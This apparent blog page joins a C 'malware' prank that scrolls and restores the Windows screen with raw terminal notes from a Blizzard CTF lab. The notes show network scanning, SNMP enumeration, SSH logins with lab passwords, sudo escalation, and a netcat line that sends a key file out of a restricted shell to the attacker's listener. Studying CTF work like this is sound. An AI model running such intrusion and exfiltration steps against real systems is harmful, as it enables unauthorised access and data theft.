Friday, February 11, 2022

Malware that moves the page

 /********************************************************************************************
Author/Reverser    :    x9090
Tested compiler     :    Visual Studio 2003/Visual Studio 2008 Express Edition
Tested Platform    :    WinXP SP2 & WinXP SP3
Disclaimer        :    This source code is provided for educational purposes.
                The author takes no responsibility for any misuse, violence or damage
                caused by the contents here.

*********************************************************************************************/
#include <windows.h>

// Forward declarations for the screen-shifting routines defined below.
void prepare_screen();
void change_hor_screen(int);
void change_ver_screen(int);
void horizontal_flipped();
void vertical_flipped();

// Shared GDI state. prepare_screen() fills all five in; the other routines only read them.
int dcHorzres;      // GetDeviceCaps(hDC, HORZRES)
int dcVertres;      // GetDeviceCaps(hDC, VERTRES)
HDC hDC;            // DC returned by GetDC(NULL)
HDC hMemoryDC;      // memory DC created compatible with hDC
HBITMAP hBitmap;    // bitmap selected into hMemoryDC; receives the initial copy of hDC

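// Repaints the screen DC from the saved snapshot, shifted right by x pixels
// with wrap-around: the left (width - x) columns of the snapshot are drawn
// starting at column x, and the remaining x columns are drawn at column 0.
//
// x may be any int, including negative values; it is reduced into [0, width).
// Does nothing if the screen dimensions have not been captured.
void change_hor_screen(int x)
{
    int width;
    int height;

    width  = dcHorzres;
    height = dcVertres;

    // Without valid dimensions there is nothing to draw, and the remainder
    // below would divide by zero.
    if (width <= 0 || height <= 0)
    {
        return;
    }

    // C's % truncates toward zero, so a negative x leaves a negative
    // remainder. Fold it back so both blits always get in-range extents.
    x %= width;
    if (x < 0)
    {
        x += width;
    }

    BitBlt(hDC, x, 0, width - x, height, hMemoryDC, 0, 0, SRCCOPY);
    BitBlt(hDC, 0, 0, x, height, hMemoryDC, width - x, 0, SRCCOPY);
}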

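// Repaints the screen DC from the saved snapshot, shifted down by y pixels
// with wrap-around: the top (height - y) rows of the snapshot are drawn
// starting at row y, and the remaining y rows are drawn at row 0.
//
// y may be any int, including negative values; it is reduced into [0, height).
// Does nothing if the screen dimensions have not been captured.
void change_ver_screen(int y)
{
    int width;
    int height;

    width  = dcHorzres;
    height = dcVertres;

    // Without valid dimensions there is nothing to draw, and the remainder
    // below would divide by zero.
    if (width <= 0 || height <= 0)
    {
        return;
    }

    // Wrap by the vertical extent. Wrapping by the width lets y exceed the
    // screen height on a landscape display, which makes (height - y) negative.
    // C's % truncates toward zero, so a negative remainder is folded back.
    y %= height;
    if (y < 0)
    {
        y += height;
    }

    BitBlt(hDC, 0, y, width, height - y, hMemoryDC, 0, 0, SRCCOPY);
    BitBlt(hDC, 0, 0, width, y, hMemoryDC, 0, height - y, SRCCOPY);
}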

// Takes a snapshot of the whole screen and publishes the handles the other
// routines work with.
//
// GetDC(NULL) yields a DC for the entire screen; its HORZRES/VERTRES device
// caps give the snapshot size. A compatible memory DC and bitmap are created,
// the bitmap is selected into the memory DC, and the screen contents are
// copied into it with BitBlt. This GetDC(NULL) -> CreateCompatibleBitmap ->
// BitBlt sequence is the same one screen-capture code uses.
//
// NOTE(review): no return value is checked, and the object previously selected
// into the memory DC (the SelectObject return value) is discarded, so it cannot
// be restored during cleanup.
void prepare_screen()
{
    HDC     screen;
    HDC     shadow;
    HBITMAP snapshot;
    int     w;
    int     h;

    screen   = GetDC(NULL);
    w        = GetDeviceCaps(screen, HORZRES);
    h        = GetDeviceCaps(screen, VERTRES);
    shadow   = CreateCompatibleDC(screen);
    snapshot = CreateCompatibleBitmap(screen, w, h);

    SelectObject(shadow, snapshot);
    BitBlt(shadow, 0, 0, w, h, screen, 0, 0, SRCCOPY);

    // Publish the captured state through the file-level globals.
    hDC       = screen;
    dcHorzres = w;
    dcVertres = h;
    hMemoryDC = shadow;
    hBitmap   = snapshot;
}

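// Slides the screen image sideways in four phases of 200 frames each, one
// frame every 30 ms: accelerate away (offset = t^2), decelerate to a stop,
// accelerate back, and decelerate until the offset returns to 0.
//
// Each phase starts from the offset and slope the previous one ended with, so
// the motion is continuous across phase boundaries.
//
// The running offset is deliberately NOT reduced modulo the screen width
// between phases. It stays non-negative (at most 80000 with these constants)
// and change_hor_screen() wraps it itself. Reducing it here makes the third
// phase pass large negative offsets, which a truncating % does not wrap.
void horizontal_flipped()
{
    enum { STEPS = 200, FRAME_DELAY_MS = 30 };

    int accel = 1;      // coefficient of the quadratic term
    int base;           // offset at the start of the current phase
    int slope;          // linear coefficient of the current phase
    int t;

    // Phase 1: offset = accel * t^2
    for (t = 0; t < STEPS; t++)
    {
        change_hor_screen(accel * t * t);
        Sleep(FRAME_DELAY_MS);
    }

    // Phase 2: offset = base + slope * t - accel * t^2 (slows to a stop)
    base  = STEPS * STEPS * accel;
    slope = STEPS * 2 * accel;
    for (t = 0; t < STEPS; t++)
    {
        change_hor_screen((t * slope + base) - (t * t * accel));
        Sleep(FRAME_DELAY_MS);
    }

    // Phase 3: offset = base - accel * t^2 (accelerates back)
    base = (STEPS * slope + base) - (STEPS * STEPS * accel);
    for (t = 0; t < STEPS; t++)
    {
        change_hor_screen(base - t * t * accel);
        Sleep(FRAME_DELAY_MS);
    }

    // Phase 4: offset = base + slope * t + accel * t^2 with a negative slope
    // (slows down and ends at offset 0)
    base  = base - STEPS * STEPS * accel;
    slope = STEPS * -2 * accel;
    for (t = 0; t < STEPS; t++)
    {
        change_hor_screen(t * t * accel + t * slope + base);
        Sleep(FRAME_DELAY_MS);
    }
}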

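// Slides the screen image vertically in four phases of 200 frames each, one
// frame every 30 ms: accelerate away (offset = t^2), decelerate to a stop,
// accelerate back, and decelerate until the offset returns to 0.
//
// Each phase starts from the offset and slope the previous one ended with, so
// the motion is continuous across phase boundaries.
//
// The running offset is deliberately NOT reduced between phases. Reducing it
// modulo the screen width mixes the horizontal extent into a vertical offset
// and makes the third phase pass large negative offsets, which a truncating %
// does not wrap. Left alone it stays non-negative (at most 80000 with these
// constants), and change_ver_screen() does the wrapping.
void vertical_flipped()
{
    enum { STEPS = 200, FRAME_DELAY_MS = 30 };

    int accel = 1;      // coefficient of the quadratic term
    int base;           // offset at the start of the current phase
    int slope;          // linear coefficient of the current phase
    int t;

    // Phase 1: offset = accel * t^2
    for (t = 0; t < STEPS; t++)
    {
        change_ver_screen(accel * t * t);
        Sleep(FRAME_DELAY_MS);
    }

    // Phase 2: offset = base + slope * t - accel * t^2 (slows to a stop)
    base  = STEPS * STEPS * accel;
    slope = STEPS * 2 * accel;
    for (t = 0; t < STEPS; t++)
    {
        change_ver_screen((t * slope + base) - (t * t * accel));
        Sleep(FRAME_DELAY_MS);
    }

    // Phase 3: offset = base - accel * t^2 (accelerates back)
    base = (STEPS * slope + base) - (STEPS * STEPS * accel);
    for (t = 0; t < STEPS; t++)
    {
        change_ver_screen(base - t * t * accel);
        Sleep(FRAME_DELAY_MS);
    }

    // Phase 4: offset = base + slope * t + accel * t^2 with a negative slope
    // (slows down and ends at offset 0)
    base  = base - STEPS * STEPS * accel;
    slope = STEPS * -2 * accel;
    for (t = 0; t < STEPS; t++)
    {
        change_ver_screen(t * t * accel + t * slope + base);
        Sleep(FRAME_DELAY_MS);
    }
}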
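// Entry point: snapshot the screen, run the horizontal and then the vertical
// slide animation, repaint the screen from the snapshot, and release the GDI
// objects that prepare_screen() acquired.
int main()
{
    Sleep(30);
    prepare_screen();
    horizontal_flipped();
    vertical_flipped();

    // Restore the screen from the snapshot taken in prepare_screen().
    BitBlt(hDC, 0, 0, dcHorzres, dcVertres, hMemoryDC, 0, 0, SRCCOPY);

    // Cleanup. hBitmap is still selected into hMemoryDC, so the memory DC goes
    // first and the bitmap is deleted afterwards.
    DeleteDC(hMemoryDC);
    DeleteObject(hBitmap);

    // A DC obtained with GetDC() is handed back with ReleaseDC(); DeleteDC() is
    // only for DCs the program created itself. Selecting the snapshot bitmap
    // into the screen DC, as the cleanup did before, restores nothing.
    ReleaseDC(NULL, hDC);
    return 0;
}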

Blizzard CTF - part III - notes

 root@kali2:~# tftp 10.0.2.33 69
tftp> get p@5$w0rd.txt
Transfer timed out.
tftp> quit

root@kali2:~# nslookup ctfboard.local
Server:        10.0.7.254
Address:    10.0.7.254#53

** server can't find ctfboard.local: NXDOMAIN

root@kali2:~# nmap 10.0.2.0/24 -p 53

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:15 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00047s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00045s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.80
Host is up (0.00053s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00051s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00040s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00049s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00056s latency).
PORT   STATE  SERVICE
53/tcp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00038s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00034s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

root@kali2:~# cat sombra.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkAPY0zMTQrcMajJrhMeRbJcCJrHQpyVD+3tTsjM+TsuP/Dzw0Y1I+ZXGefgAVwHXvyMkxXodrFZn66Si/VZLRNN3glm0ByPszEVMMpA7d/isQDODAWK9e/moRI3deJ0yjSCZ4TXT/d67Zmd73Pcr5DGkRXtbCSktjHzCnKPkr1T+gnTAINeMXdBqYKQtURwTsXMJ9y7MlxEuCbmjBIkHP90qUcHoaODKPKU0uAnAYXtRHeWk+z3cPlrjLtFTYhstYvSKqhgg5cc61B7t/Q8+Mt/u+ZP+bz5haC8ipvPrHEKwQ5HiNO/+oAQ/+gCcUG/7ja9z1IrqZV3/jl6DddArN

root@kali2:~# nmap -sT 10.0.2.10

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:49 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00039s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
443/tcp  open  https
8888/tcp open  sun-answerbook


root@kali2:~# nslookup scoreboard.local
Server:        10.0.7.254
Address:    10.0.7.254#53

Non-authoritative answer:
Name:    scoreboard.local
Address: 10.0.2.10


root@kali2:~# ssh ubuntu@10.0.2.163 -p 5555
The authenticity of host '[10.0.2.163]:5555 ([10.0.2.163]:5555)' can't be established.
ECDSA key fingerprint is e1:13:83:84:5f:63:9b:7a:e2:e2:f3:e5:15:b0:7d:85.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.0.2.163]:5555' (ECDSA) to the list of known hosts.
ubuntu@10.0.2.163's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.13.0-129-generic i686)

ubuntu@ubuntu:~$ ls
ubuntu@ubuntu:~$ pwd
/home/ubuntu
ubuntu@ubuntu:~$ cd ..
ubuntu@ubuntu:/home$ ls
ubuntu
ubuntu@ubuntu:/home$ cd ..
ubuntu@ubuntu:/$ ls
bin  boot  dev  etc  home  initrd.img  lib  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz
ubuntu@ubuntu:/$ cd /root
-bash: cd: /root: Permission denied
ubuntu@ubuntu:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

ubuntu@ubuntu:/var/tmp$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ubuntu@ubuntu:/var/tmp$ whoami
ubuntu
ubuntu@ubuntu:/var/tmp$ nano id
ubuntu@ubuntu:/var/tmp$ chmod +x id
ubuntu@ubuntu:/var/tmp$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ubuntu@ubuntu:/var/tmp$ ./id
sudo: unable to resolve host ubuntu
ubuntu@ubuntu:/var/tmp$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ubuntu@ubuntu:/var/tmp$ cat id
# ensure running as root
if [ "$(id -u)" != "0" ]; then
  exec sudo "$0" "$@"
fi
ubuntu@ubuntu:/var/tmp$ sudo id
sudo: unable to resolve host ubuntu
uid=0(root) gid=0(root) groups=0(root)
ubuntu@ubuntu:/var/tmp$ whoami
ubuntu

ubuntu@ubuntu:/var/tmp$ sudo id
sudo: unable to resolve host ubuntu
uid=0(root) gid=0(root) groups=0(root)

root@kali2:~# nc -lnvp 80
listening on [any] 80 ...
connect to [10.0.4.3] from (UNKNOWN) [10.0.4.3] 52345
GET / HTTP/1.1
Host: 10.0.4.3
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0

root@kali2:~# nmap -sU -p 53 --script dns-client-subnet-scan 10.0.2.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 16:53 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00051s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00050s latency).
PORT   STATE SERVICE
53/udp open  domain

Nmap scan report for 10.0.2.80
Host is up (0.00044s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00046s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00046s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00055s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00057s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00045s latency).
PORT   STATE  SERVICE
53/udp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00091s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00080s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap done: 256 IP addresses (10 hosts up) scanned in 4.14 seconds

root@kali2:~# nmap -sV 10.0.2.0-254
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00035s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
80/tcp   open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp  open  ssl/http Microsoft IIS httpd 7.5
8888/tcp open  ssl/http Microsoft IIS httpd 7.5
Service Info: OSs: Unix, Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 10.0.2.33
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE       VERSION
22/tcp    open  tcpwrapped
4848/tcp  open  appserv-http?
12345/tcp open  netbus?

Nmap scan report for 10.0.2.80
Host is up (0.00042s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE    VERSION
3000/tcp closed ppp
3001/tcp open   tcpwrapped

Nmap scan report for 10.0.2.81
Host is up (0.00045s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js (Express middleware)

Nmap scan report for 10.0.2.92
Host is up (0.00036s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
1052/tcp open  http       Tornado httpd 4.2.1
8080/tcp open  http-proxy

Nmap scan report for 10.0.2.128
Host is up (0.00041s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd 1.4.45

Nmap scan report for 10.0.2.163
Host is up (0.00039s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
5555/tcp open   ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.0.2.168
Host is up (0.00053s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
6666/tcp open  irc?


Blizzard CTF - part II

 
  201  sendEmail -f "services@lethallab.com" -t admin@lethallab.com -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: hacker" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

root@kali2:~# cat p@5\$w0rd.txt
blizzard{RightOnTarget}

User: Tracer
Pass: RightOnTarget

root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for 10.0.2.33
Host is up (0.00039s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.80
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00050s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00048s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00043s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00053s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00029s latency).
PORT   STATE  SERVICE
53/tcp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00047s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 256 IP addresses (10 hosts up) scanned in 4.06 seconds
 

root@kali2:~# nmap --dns-server -sL 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:37 PST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.0.2.33
Host is up (0.00047s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
4848/tcp  open  appserv-http
12345/tcp open  netbus

Nmap done: 1 IP address (1 host up) scanned in 4.41 seconds
root@kali2:~# ssh Tracer@10.0.2.33
Tracer@10.0.2.33's password:
Permission denied, please try again.
Tracer@10.0.2.33's password:

[1]+  Stopped                 ssh Tracer@10.0.2.33

root@kali2:~# ssh tracer@10.0.2.33
tracer@10.0.2.33's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-97-generic x86_64)

Last login: Sun Nov  5 15:36:47 2017 from 10.0.4.20
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
tracer:~$ ls
sombra_id_rsa  sombra_id_rsa.pub
tracer:~$ cat sombra_id_rsa.pub
*** forbidden command: cat
tracer:~$ nc 10.0.4.3 1234 < sombra_id_rsa.pub
tracer:~$ Write failed: Broken pipe
root@kali2:~#

Blizzard CTF - part I

README file:

Sombra True Random Number Generator (STRNG) is a QEMU-based emulated
hardware device developed by Sombra for Blizzard CTF 2017.

STRNG's QEMU can be run with the following command:

    ./qemu-system-x86_64 -m 1G \
        -device strng \
        -hda my-disk.img \
        -hdb my-seed.img \
        -nographic \
        -L pc-bios/ \
        -enable-kvm \
        -device e1000,netdev=net0 \
        -netdev user,id=net0,hostfwd=tcp::5555-:22

The flag is located at /root/flag on the host. The host uses the same image
as the guest as base image.

You can access the guest over SSH at 10.0.2.163:5555. The
username is "ubuntu" and password "passw0rd". The guest is reset every 10
minutes.

#############

root@kali2:~# snmp-check -t 10.0.2.10
snmpcheck v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 [*] Try to connect to 10.0.2.10
 [*] Connected to 10.0.2.10
 [*] Starting enumeration at 2017-11-05 09:13:52
 [*] Error: No response from remote host "10.0.2.10".
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmp-check line 320.

root@kali2:~# snmp-check -t 10.0.2.33 -p 161
snmpcheck v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 [*] Try to connect to 10.0.2.33
 [*] Connected to 10.0.2.33
 [*] Starting enumeration at 2017-11-05 09:25:29

 [*] System information
 -----------------------------------------------------------------------------------------------

 Hostname               : basic
 Description            : Linux basic 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64
 Uptime system          : 19 minutes, 48.35
 Uptime SNMP daemon     : 19 minutes, 39.76
 Contact                : nobody@example.org
 Location               : blizzard{p@5$w0rd.txt}
 Motd                   : -

 [*] Devices information
 -----------------------------------------------------------------------------------------------

    Id                 Type   Status  Description

 196608            Processor  Running  GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz
 196609            Processor  Running  GenuineIntel: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz
 262145              Network  Running  network interface lo
 262146              Network  Running  network interface ens160
 786432          Coprocessor  Unknown  Guessing that there's a floating point co-processor

 [*] Storage information
 -----------------------------------------------------------------------------------------------

 Physical memory
    Device id       : 1
    Device type     : Ram
    Filesystem type : LinuxExt2
    Device units    : 1024
    Memory size     : 993M
    Memory used     : 575M
    Memory free     : 418M



 [*] Processes
 -----------------------------------------------------------------------------------------------

 Total processes : 116

 Process type    : 1 unknown, 2 operating system, 3 device driver, 4 application
 Process status  : 1 running, 2 runnable, 3 not runnable, 4 invalid

 Process id              Process name  Process type  Process status  Process path

          1                   systemd             4               2  /sbin/init
         10                watchdog/0             2               2  
       1003                       atd             4               2  /usr/sbin/atd
       1006                  vmtoolsd             4               2  /usr/bin/vmtoolsd
       1008                  rsyslogd             4               2  /usr/sbin/rsyslogd
       1009                      cron             4               2  /usr/sbin/cron
       1014           accounts-daemon             4               2  /usr/lib/accountsservice/accounts-daemon
       1015            systemd-logind             4               2  /lib/systemd/systemd-logind
       1017                     lxcfs             4               2  /usr/bin/lxcfs
       1026               dbus-daemon             4               2  /usr/bin/dbus-daemon
       1074                     acpid             4               2  /usr/sbin/acpid
       1079                     snapd             4               2  /usr/lib/snapd/snapd
       1090                     mdadm             4               2  /sbin/mdadm
       1094                   polkitd             4               2  /usr/lib/policykit-1/polkitd
         11                watchdog/1             2               2  
       1121              kworker/1:1H             2               2  
       1189                      sshd             4               2  /usr/sbin/sshd
       1191                     named             4               2  /usr/sbin/named
       1193                       php             4               2  /usr/bin/php
       1195                       php             4               2  /usr/bin/php
       1198                    python             4               2  /usr/bin/python
         12               migration/1             2               2  
       1217                    iscsid             4               2  /sbin/iscsid
       1218                    iscsid             4               2  /sbin/iscsid
       1278                    atftpd             4               2  /usr/sbin/atftpd
       1284           inetutils-inetd             4               2  /usr/sbin/inetutils-inetd
       1287                irqbalance             4               2  /usr/sbin/irqbalance
       1299                    agetty             4               2  /sbin/agetty
         13               ksoftirqd/1             2               2  
       1315                     snmpd             4               1  /usr/sbin/snmpd
       1382           systemd-network             4               2  /lib/systemd/systemd-networkd
         14               kworker/1:0             2               2  
        148                mpt_poll_0             2               2  
        149                     mpt/0             2               2  
         15              kworker/1:0H             2               2  
        150                 kpsmoused             2               2  
         16                 kdevtmpfs             2               2  
         17                     netns             2               2  
         18                      perf             2               2  
        180                 scsi_eh_2             2               2  
        181                scsi_tmf_2             2               2  
        182                    bioset             2               2  
        183                  ttm_swap             2               2  
         19                khungtaskd             2               2  
          2                  kthreadd             2               2  
         20                 writeback             2               2  
       2017                        sh             4               2  sh
       2018                      ping             4               2  ping
       2079              kworker/u4:2             2               2  
         21                      ksmd             2               2  
       2142               kworker/1:1             2               2  
       2167                      sshd             4               2  sshd: unknown [priv]
       2168                      sshd             4               2  sshd: unknown [net]
       2170                      sshd             4               2  sshd: [accepted]
       2171                      sshd             4               2  sshd: [net]
         22                khugepaged             2               2  
         23                    crypto             2               2  
         24               kintegrityd             2               2  
         25                    bioset             2               2  
         26                   kblockd             2               2  
        268                   raid5wq             2               2  
         27                   ata_sff             2               2  
         28                        md             2               2  
         29                devfreq_wq             2               2  
        292                  kdmflush             2               2  
        293                    bioset             2               2  
          3               ksoftirqd/0             2               2  
         30              kworker/u4:1             2               2  
        302                  kdmflush             2               2  
        303                    bioset             2               2  
         32               kworker/0:1             2               2  
        321                    bioset             2               2  
         34                   kswapd0             2               2  
        345               jbd2/dm-0-8             2               2  
        346           ext4-rsv-conver             2               2  
         35                    vmstat             2               2  
         36             fsnotify_mark             2               2  
         37           ecryptfs-kthrea             2               2  
        395              kworker/0:1H             2               2  
        399                  iscsi_eh             2               2  
          4               kworker/0:0             2               2  
        408           systemd-journal             4               2  /lib/systemd/systemd-journald
        412               kworker/1:2             2               2  
        424                   kauditd             2               2  
        438                   ib_addr             2               2  
        440                  ib_mcast             2               2  
        441               ib_nl_sa_wq             2               2  
        442                   lvmetad             4               2  /sbin/lvmetad
        443                     ib_cm             2               2  
        449                  iw_cm_wq             2               2  
        451                   rdma_cm             2               2  
        468             systemd-udevd             4               2  /lib/systemd/systemd-udevd
          5              kworker/0:0H             2               2  
         53                  kthrotld             2               2  
         54           acpi_thermal_pm             2               2  
         55                    bioset             2               2  
         56                    bioset             2               2  
         57                    bioset             2               2  
         58                    bioset             2               2  
         59                    bioset             2               2  
         60                    bioset             2               2  
         61                    bioset             2               2  
         62                    bioset             2               2  
         63                 scsi_eh_0             2               2  
         64                scsi_tmf_0             2               2  
         65                 scsi_eh_1             2               2  
         66                scsi_tmf_1             2               2  
          7                 rcu_sched             2               2  
         72             ipv6_addrconf             2               2  
          8                    rcu_bh             2               2  
        843           ext4-rsv-conver             2               2  
        867           systemd-timesyn             4               2  /lib/systemd/systemd-timesyncd
         87                   deferwq             2               2  
         88           charger_manager             2               2  
         89                    bioset             2               2  

  [*] Network interfaces
 -----------------------------------------------------------------------------------------------

 Interface               : [ up ] lo

    Interface Speed  : 10 Mbps
    IP Address       : 10.0.2.33
    Netmask          : 255.255.255.0
    MTU              : 65536
    Bytes In         : 13033 (13K)
    Bytes Out        : 13033 (13K)

 Interface               : [ up ] VMware VMXNET3 Ethernet Controller

    Hardware Address : 00:0c:29:d1:04:53
    Interface Speed  : 4294.967295 Mbps
    IP Address       : 127.0.0.1
    Netmask          : 255.0.0.0
    MTU              : 1500
    Bytes In         : 23843778 (23M)
    Bytes Out        : 11290971 (11M)


 [*] Routing information
 -----------------------------------------------------------------------------------------------

      Destination      Next Hop           Mask    Metric

          0.0.0.0       10.0.2.254          0.0.0.0        1

 [*] Listening TCP ports and connections
 -----------------------------------------------------------------------------------------------

   Local Address   Port      Remote Address   Port       State

         0.0.0.0  12345             0.0.0.0      -       Listening
         0.0.0.0     22             0.0.0.0      -       Listening
         0.0.0.0   4848             0.0.0.0      -       Listening
        10.0.2.33  12345           10.0.4.93  42558     Established
       10.0.2.33     22          10.0.4.192  55360     Established
       10.0.2.33     22           10.0.4.84   7821     Established
       10.0.2.33   4848          10.0.4.121  60157      Close wait
       10.0.2.33   4848           10.0.4.93    816    SYN received
       10.0.2.33     53             0.0.0.0      -       Listening
       127.0.0.1     53             0.0.0.0      -       Listening

 [*] Listening UDP ports
 -----------------------------------------------------------------------------------------------

   Local Address   Port

         0.0.0.0    161
         0.0.0.0  39876
         0.0.0.0  52793
         0.0.0.0     69
       10.0.2.33     53

 [*] Mountpoints
 -----------------------------------------------------------------------------------------------

 /
 /run
